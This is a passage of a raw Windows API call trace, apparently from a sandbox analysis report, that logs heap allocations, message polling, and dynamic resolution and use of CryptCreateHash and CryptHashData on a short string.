RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.509] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0189.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.512] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.512] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e509c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.513] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0189.513] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.513] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0189.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0189.515] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0189.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0189.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d78, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0189.515] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.515] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.515] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.516] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.517] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0189.518] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50a58 [0189.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.519] CryptHashData (hHash=0xa87050, pbData=0x2e54d18, dwDataLen=0x3, dwFlags=0x1) returned 1 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0189.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.521] HeapFree 